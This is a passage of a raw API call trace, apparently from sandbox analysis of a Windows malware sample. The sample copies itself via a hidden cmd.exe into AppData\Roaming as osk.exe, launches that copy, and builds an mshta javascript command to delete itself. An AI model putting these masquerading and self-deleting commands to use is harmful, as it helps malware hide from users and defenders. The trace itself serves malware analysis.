GlobalHandle (pMem=0x600668) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.998] GlobalLock (hMem=0x280004) returned 0x600668 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 [0057.999] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 
[0057.999] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.999] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 [0057.999] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.999] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.999] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.999] GlobalLock (hMem=0x280004) returned 0x600668 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.999] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 [0057.999] SHGetMalloc (in: ppMalloc=0x18fd40 | out: ppMalloc=0x18fd40*=0x767666bc) returned 0x0 [0058.000] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=26, ppidl=0x18fd3c | out: ppidl=0x18fd3c) returned 0x0 [0058.072] SHGetPathFromIDListW (in: pidl=0x5feb68, pszPath=0x611fdc | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0058.074] SysReAllocStringLen (in: pbstr=0x18fd68*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x18fd68*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0058.074] IMalloc:Free (This=0x767666bc, pv=0x5feb68) [0058.074] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0058.074] SysReAllocStringLen (in: pbstr=0x441208*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x441208*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0058.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1da98b8, cbMultiByte=7, lpWideCharStr=0x18ed3c, cchWideChar=2047 | out: lpWideCharStr="osk.exe\x18ㅬ疧\x18㹕疧佹`\x18") returned 7 [0058.074] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0058.078] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0058.081] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.081] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.081] GlobalUnlock (hMem=0x280004) returned 0 [0058.081] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.081] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.081] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.082] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.082] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.082] GlobalLock (hMem=0x280004) returned 0x6163c0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.082] GlobalHandle (pMem=0x6163c0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.082] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.083] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0058.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed1f1500, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1732, cFileName="osk.exe", cAlternateFileName="")) returned 0x607ed8 [0058.083] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0058.083] FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0058.083] FindClose (in: hFindFile=0x607ed8 | out: hFindFile=0x607ed8) returned 1 [0058.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed1f1500, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1732, cFileName="osk.exe", cAlternateFileName="")) returned 0x607ed8 [0058.083] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0058.084] FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0058.084] FindClose (in: hFindFile=0x607ed8 | out: hFindFile=0x607ed8) returned 1 [0058.084] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 1 [0058.087] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fc14, nSize=0x20a | 
out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0058.088] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.088] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.088] GlobalUnlock (hMem=0x28000c) returned 0 [0058.088] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.088] GlobalLock (hMem=0x280004) returned 0x6163c0 [0058.088] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.088] GlobalUnlock (hMem=0x28000c) returned 0 [0058.088] GlobalHandle (pMem=0x6163c0) returned 0x280004 [0058.088] GlobalUnlock (hMem=0x280004) returned 0 [0058.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d9a708, cbMultiByte=18, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="/c copy /y \"@\" \"#\"\x18\x18㩘^") returned 18 [0058.088] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"@\" \"#\"", len=0x12 | out: pbstr=0x18fdc0*="/c copy /y \"@\" \"#\"") returned 1 [0058.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"@\" \"#\"", cchWideChar=18, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 18 [0058.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\" \"#\"", cchWideChar=5, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\" \"#\"py /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 5 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.089] SysReAllocStringLen (in: pbstr=0x18fe14*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe14*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0058.089] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"@\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0058.089] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fdc0*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", cchWideChar=65, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", lpUsedDefaultChar=0x0) returned 65 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\"", cchWideChar=1, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.090] SysReAllocStringLen (in: pbstr=0x18fe10*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe10*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0058.090] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0058.090] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.090] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.090] GlobalUnlock (hMem=0x280004) returned 0 [0058.090] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.090] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.090] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.090] GlobalUnlock (hMem=0x280004) returned 0 [0058.090] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.090] GlobalUnlock (hMem=0x28000c) returned 0 [0058.090] GetEnvironmentVariableA (in: lpName="COMSPEC", lpBuffer=0x18f9cc, nSize=0x400 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.090] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d62b38, cbMultiByte=27, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe^矆»") returned 27 [0058.091] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", 
lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18fd90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fd80 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", lpProcessInformation=0x18fd80*(hProcess=0xe8, hThread=0xe4, dwProcessId=0x7d4, dwThreadId=0x40c)) returned 1 [0058.119] WaitForSingleObject (hHandle=0xe8, dwMilliseconds=0xffffffff) returned 0x0 [0058.323] CloseHandle (hObject=0xe8) returned 1 [0058.323] CloseHandle (hObject=0xe4) returned 1 [0058.323] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fb80 | out: lpFindFileData=0x18fb80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed80ad60, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="osk.exe", cAlternateFileName="")) returned 0x60ae90 [0058.323] FileTimeToLocalFileTime (in: lpFileTime=0x18fb94, lpLocalFileTime=0x18fb14 | out: lpLocalFileTime=0x18fb14) returned 1 [0058.323] FileTimeToDosDateTime (in: lpFileTime=0x18fb14, lpFatDate=0x18fb62, lpFatTime=0x18fb60 | out: lpFatDate=0x18fb62, lpFatTime=0x18fb60) returned 1 [0058.323] FindClose (in: hFindFile=0x60ae90 | out: hFindFile=0x60ae90) returned 1 [0058.324] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" 
runas" [0058.325] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0058.325] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.325] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.325] GlobalUnlock (hMem=0x28000c) returned 0 [0058.325] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.325] GlobalLock (hMem=0x280004) returned 0x6163c0 [0058.325] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.325] GlobalUnlock (hMem=0x28000c) returned 0 [0058.325] GlobalHandle (pMem=0x6163c0) returned 0x280004 [0058.325] GlobalUnlock (hMem=0x280004) returned 0 [0058.325] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.325] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.325] GlobalUnlock (hMem=0x280004) returned 0 [0058.325] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.326] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.326] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.326] GlobalUnlock (hMem=0x280004) returned 0 [0058.326] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.326] GlobalUnlock (hMem=0x28000c) returned 0 [0058.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d9a708, cbMultiByte=16, lpWideCharStr=0x18ee1c, cchWideChar=2047 | out: lpWideCharStr=":Zone.Identifier") returned 16 [0058.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe:Zone.Identifier", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x678dde1e, ftCreationTime.dwLowDateTime=0x5e00c4, ftCreationTime.dwHighDateTime=0x5e3a58, ftLastAccessTime.dwLowDateTime=0x96b1489b, ftLastAccessTime.dwHighDateTime=0x5e0000, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x5e3a58, dwReserved0=0x766ae7d9, dwReserved1=0xbf0657be, cFileName="䢛隱ޅ", cAlternateFileName="䱈@佶`伔`企@﹘\x18㨜_﹠\x18")) returned 0xffffffff [0058.326] GetLastError () returned 0x7b [0058.326] ShellExecuteW (hwnd=0x0, 
lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0059.439] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb74, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0059.439] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0059.439] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0059.439] GlobalUnlock (hMem=0x28000c) returned 0 [0059.439] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0059.439] GlobalLock (hMem=0x280004) returned 0x646dc8 [0059.439] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0059.440] GlobalUnlock (hMem=0x28000c) returned 0 [0059.440] GlobalHandle (pMem=0x646dc8) returned 0x280004 [0059.440] GlobalUnlock (hMem=0x280004) returned 0 [0059.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d79198, cbMultiByte=142, lpWideCharStr=0x18ed7c, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"pData\\Roaming\\osk.exe") returned 142 [0059.440] SysReAllocStringLen (in: pbstr=0x18fd70*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", len=0x8e | out: pbstr=0x18fd70*="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"") returned 1 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", cchWideChar=142, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe 
\"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 142 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", cchWideChar=99, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 99 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", cchWideChar=72, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\");close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 72 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@!);close()}catch(e){}},10);\"", 
cchWideChar=29, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@!);close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\");close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 29 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");close()}catch(e){}},10);\"", cchWideChar=27, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");close()}catch(e){}},10);\";\"o.DeleteFile(!@!);close()}catch(e){}},10);\");close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 27 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.442] SysReAllocStringLen (in: pbstr=0x18fdb8*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", len=0x8e | out: pbstr=0x18fdb8*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"") returned 1 [0059.442] SysReAllocStringLen (in: pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", len=0x8e | out: 
pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"") returned 1 [0059.442] SysReAllocStringLen (in: pbstr=0x18fd70*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", len=0x8e | out: pbstr=0x18fd70*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"") returned 1 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", cchWideChar=142, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 142 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="');close()}catch(e){}},10);\"", cchWideChar=28, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="');close()}catch(e){}},10);\"ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"c", 